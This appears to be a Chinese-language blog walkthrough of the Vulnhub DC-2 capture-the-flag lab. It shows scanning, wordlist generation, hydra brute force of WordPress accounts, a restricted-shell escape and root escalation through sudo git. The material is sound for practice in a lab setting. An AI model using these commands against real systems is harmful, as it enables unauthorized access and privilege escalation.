Vulnhub靶機實戰——DC-2
阿新 • • 發佈:2020-08-09
下載地址
https://www.five86.com/dc-2.html
環境
kali ip:192.168.232.128
靶機 ip:192.168.232.133
操作
掃靶機的ip
arp-scan -l #192.168.232.133
nmap檢視開放的埠
nmap -sVT -p- 192.168.232.133
80,7744(ssh)埠開放
ssh開放,可以爆破。
80埠開放,直接網頁放訪問192.168.232.133,顯示無法正常訪問頁面,域名變為dc-2,說明靶機做了配置,輸入ip直接跳到dc-2域名。
直接修改本地hosts檔案,新增ip對應域名。
win10路徑:C:\Windows\System32\drivers\etc
linux路徑:etc/hosts
訪問網頁發現是wordpress還有flag1,提示用cewl獲取頁面資訊生成欄位來進行密碼爆破進行登入。
cewl獲取密碼字典
cewl -w dc2_wordlist http://dc-2
用hydra爆破使用者名稱
發現jerry和tom兩個使用者
用nikto工具掃描網站結構
niko -h dc-2 -o nikto-dc2.txt
找到/wp-login.php登陸介面。
登入兩個使用者tom沒發現什麼,jerry的pages下發現了flag2,提示我們ssh登入。
ssh -p 7744 [email protected] #登陸失敗
ssh -p 7744 [email protected] #登陸成功
檢視檔案
ls
發現flag3
cat flag3
執行命令失敗,這是因為ssh遠端連線到伺服器的環境變數中不包含對應可執行檔案的路徑,只能執行less、ls、scp、vi命令。需要自行新增
BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
bash: groups: command not found
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin
cat flag3.txt
參考連結:
https://blog.csdn.net/Auuuuuuuu/article/details/99607546
https://blog.csdn.net/weixin_43583637/article/details/101552825
2020-8-09 第三週
flag提示我們切換到jerry
su jerry ls cat flag4.txt
flag4提示我們git,想到git提權。
sudo -l #檢視可以使用root許可權無密碼的命令,有git命令
sudo git -p –-help #提權
!/bin/sh #提權
whoami
cd /root
ls
cat final-flag.txt
完成